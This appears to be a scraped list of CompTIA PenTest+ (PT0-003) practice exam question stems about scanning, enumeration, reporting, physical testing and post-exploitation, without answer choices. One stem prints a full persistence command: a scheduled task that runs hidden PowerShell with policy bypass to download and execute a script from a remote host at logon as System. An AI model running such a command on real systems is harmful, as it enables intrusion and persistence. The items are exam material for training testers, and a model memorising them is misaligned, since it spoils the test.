COMPTIA-PENTEST

CompTIA's PT0-003 With one day left to complete the testing phase of an engagement, a penetration tester obtains the following results from an Nmap scan:Which of the following tools should the tester use to quickly identify a potential attack path?

CompTIA's PT0-003 A tester is working on an engagement that has evasion and stealth requirements. Which of the following enumeration methods is the least likely to be detected by the IDS?

CompTIA's PT0-003 A penetration tester needs to confirm the version number of a client’s web-application server. Which of the following techniques should the penetration tester use?

CompTIA's PT0-003 A penetration tester wants to identify all the TLS versions used in a web service in order to determine potentially insecure versions. Which of the following commands should the tester use?

CompTIA's PT0-003 Eight months after the completion of a penetration test, the client emails the penetration tester to debate the validity of several findings. The findings are now posing a hindrance to compliance certifications. Which of the following would most likely assist the penetration tester with de-escalation?

CompTIA's PT0-003 A tester obtained access to a computer using a SMB exploit and now has a shell access into the target computer. The tester runs the following on the obtained shell:schtask /create /tn Updates /tr "C:\windows\syswow64\Windows\WindowsPowershell\v1.0\powershell.exe hidden -NoLogo -NoInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring('http://10.10.1.2/asd')))'" /sc onlogon /ru SystemWhich of the following does this action accomplish?

CompTIA's PT0-003 During a security assessment, a penetration tester gains access to an internal server and manipulates some data to hide its presence. Which of the following is the best way for the penetration tester to hide the activities performed?

CompTIA's PT0-003 A penetration tester is assessing the overall preparedness of a client's staff for text-message-based attacks. Which of the following most accurately describes the attack technique the tester is assessing?

CompTIA's PT0-003 A penetration tester attempts to access an internet-facing web page while conducting research on site. However, the web page is no longer accessible. Which of the following is the best step for the tester to take to continue gathering details?

CompTIA's PT0-003 A penetration tester cannot complete a full vulnerability scan because the client's WAF is blocking communications. During which of the following activities should the penetration tester, discuss this issue with the client?

CompTIA's PT0-003 Which of the following is a reason to use a template when creating a penetration testing report? E. To improve testing time

CompTIA's PT0-003 During a security audit, a penetration tester wants to exploit a vulnerability in a common network protocol. The protocol allows encrypted communications to be intercepted and manipulated. Which of the following vulnerabilities should the tester exploit?

CompTIA's PT0-003 A penetration tester wants to create a malicious QR code to assist with a physical security assessment. Which of the following tools has the built-in functionality most likely needed for this task?

CompTIA's PT0-003 A penetration tester is trying to execute a post-exploitation activity and creates the follow script:Which of the following best describes the tester's objective?

CompTIA's PT0-003 While conducting a peer review for a recent assessment, a penetration tester finds the debugging mode is still enabled for the production system. Which of the following is most likely responsible for this observation?

CompTIA's PT0-003 A penetration tester completed OSINT work and needs to identify common subdomains for mydomain.com. Which of the following is the best command for the tester to use?

CompTIA's PT0-003 Which of the following should a penetration tester do when conducting post-engagement cleanup?

CompTIA's PT0-003 While performing a red-team exercise, a penetration tester uses a reading device to extract data from an employee's access badge. The tester creates a copy for unauthorized entry. Which of the following best describes this attack?

CompTIA's PT0-003 Which of the following security controls should be implemented when systems that are covered by a compliance agreement are maintained separately from other elements of an organization's infrastructure?

CompTIA's PT0-003 A penetration tester needs to launch an Nmap scan to find the state of the port for both TCP and UDP services. Which of the following commands should the tester use?

CompTIA's PT0-003 A penetration tester gains access to a domain member server and wants to identify which potential targets are available to attack. Which of the following tools should the penetration tester use?

CompTIA's PT0-003 During a web application assessment, a penetration tester identifies an administrative tool that would allow for the production database to be deleted without authorization. Which of the following is most important for the penetration tester to consider before proceeding with testing?

CompTIA's PT0-003 A company hires a penetration tester to perform an external attack surface review as part of a security engagement. The company informs the tester that the main company domain to investigate is comptia.org. Which of the following should the tester do to accomplish the assessment objective?

CompTIA's PT0-003 The following file was obtained during reconnaissance:Which of the following is most likely to be successful if a penetration tester achieves non-privileged user access?

CompTIA's PT0-003 A penetration tester uses a pair of crutches to access a client's physical location. Which of the following is the tester most likely trying to do?

CompTIA's PT0-003 A penetration tester creates the following Python script that can be used to enumerate information about email accounts on a target mail server:Which of the following logic constructs would permit the script to continue despite failure?

CompTIA's PT0-003 A penetration tester obtained a shell on a Windows system. Which of the following would the tester use to gather more information about the host?

CompTIA's PT0-003 During an engagement, a penetration tester wants to enumerate users from Linux systems by using finger and rwho commands. However, the tester realizes these commands alone will not achieve the desired result. Which of the following is the best tool to use for this task?

CompTIA's PT0-003 During a security assessment of an e-commerce website, a penetration tester wants to exploit a vulnerability in the web server’s input validation that will allow unauthorized transactions on behalf of the user. Which of the following techniques would most likely be used for that purpose?

CompTIA's PT0-003 A penetration tester is getting ready to conduct a vulnerability scan to evaluate an environment that consists of a container orchestration cluster. Which of the following tools would be best to use for this purpose?